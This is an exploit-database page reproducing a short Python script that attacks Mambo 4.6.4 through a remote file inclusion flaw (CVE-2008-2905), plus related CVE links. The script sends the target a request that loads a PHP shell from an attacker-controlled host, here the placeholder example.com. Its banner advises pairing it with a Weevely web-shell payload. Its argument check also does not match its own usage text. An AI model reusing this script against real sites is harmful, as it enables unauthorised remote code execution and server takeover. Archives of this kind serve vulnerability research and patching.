Lucene search
InfodoxPACKETSTORM:117023HistoryOct 01, 2012 - 12:00 a.m.
Mambo 4.6.4 Remote File Inclusion
2012-10-0100:00:00
infodox
packetstormsecurity.com
15
0.285 Low
EPSS
Percentile
96.9%
`#!/usr/bin/env python
# Title: Mambo 4.6.4 mosConfig_absolute_path RFI
# CVE: CVE-2008-2905
# Reference: http://heapoverflow.com/f0rums/advisories/6915-cve-2008-2905-mambo.html
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests # You better easy_install requests :3
import sys
vulnurl = "/includes/Cache/Lite/Output.php?" # Oh look, the vuln URL!
param = "mosConfig_absolute_path=" # the vuln paramater.
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
def banner():
print """
Mambo 4.6.4 mosConfig_absolute_path RFI
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
"""
if len(sys.argv) != 4:
banner()
print "Usage: ./x2.py <target>"
print "Where <target> is the vulnerable website."
print "Example: ./x2.py http://lamesite.com"
sys.exit(1)
banner()
target = sys.argv[1]
pwnme = target + vulnurl + param + payloadurl
print "[+] Running Exploit..."
requests.get(pwnme) # See? Requests is AWESOME!
print "[?] Gotshell?"
`
Related
cve
cve
CVE-2008-2905
2008-06-30 18:24:00
cvelist
cvelist
CVE-2008-2905
2008-06-30 18:00:00
packetstorm
packetstorm
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion
2009-10-30 00:00:00
prion
prion
Remote file inclusion
2008-06-30 18:24:00
nvd
nvd
CVE-2008-2905
2008-06-30 18:24:00